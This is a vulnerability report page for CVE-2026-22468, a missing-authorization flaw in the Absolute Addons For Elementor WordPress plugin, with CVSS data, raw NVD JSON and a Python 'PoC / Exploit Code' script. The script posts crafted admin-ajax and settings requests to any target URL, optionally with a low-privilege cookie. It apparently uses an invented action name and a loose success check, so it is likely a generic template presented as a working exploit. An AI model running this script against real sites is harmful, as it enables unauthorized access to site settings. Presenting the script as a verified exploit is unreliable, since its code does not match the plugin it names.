Security Vulnerability Report
中文
CVE-2026-22468 CVSS 4.3 MEDIUM

CVE-2026-22468

Published: 2026-01-22 17:16:36
Last Modified: 2026-04-28 19:36:40

Description

Missing Authorization vulnerability in AbsolutePlugins Absolute Addons For Elementor absolute-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Absolute Addons For Elementor: from n/a through <= 1.0.14.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Absolute Addons For Elementor <= 1.0.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22468 PoC - Absolute Addons For Elementor Authorization Bypass # This PoC demonstrates the missing authorization vulnerability import requests import sys def check_vulnerability(target_url, cookie=None): """ Check if the target WordPress site is vulnerable to CVE-2026-22468 """ # Target endpoint that should require authorization endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/settings' ] # Malicious payload to exploit the authorization bypass # This attempts to access admin functions with low-privilege user malicious_params = { 'action': 'absolute_addons_exploit', 'function': 'export_settings', 'data': 'all' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } if cookie: headers['Cookie'] = cookie print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-22468 - Missing Authorization in Absolute Addons For Elementor") for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint try: response = requests.post(full_url, data=malicious_params, headers=headers, timeout=10) # Check for successful unauthorized access if response.status_code == 200 and ('settings' in response.text or 'export' in response.text): print(f"[+] VULNERABLE: {endpoint} - Authorization bypass detected") print(f"[+] Response preview: {response.text[:200]}...") return True else: print(f"[-] Not vulnerable: {endpoint}") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {str(e)}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-22468.py <target_url> [cookie]") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else None is_vulnerable = check_vulnerability(target, cookie) if is_vulnerable: print("\n[!] Target is vulnerable to CVE-2026-22468") print("[!] Recommendation: Update Absolute Addons For Elementor to version > 1.0.14") else: print("\n[+] Target appears to be patched or not using affected plugin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22468", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:35.523", "lastModified": "2026-04-28T19:36:39.543", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in AbsolutePlugins Absolute Addons For Elementor absolute-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Absolute Addons For Elementor: from n/a through <= 1.0.14."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en AbsolutePlugins Absolute Addons para Elementor absolute-addons permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Absolute Addons para Elementor: desde n/a hasta &lt;= 1.0.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/absolute-addons/vulnerability/wordpress-absolute-addons-for-elementor-plugin-1-0-14-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}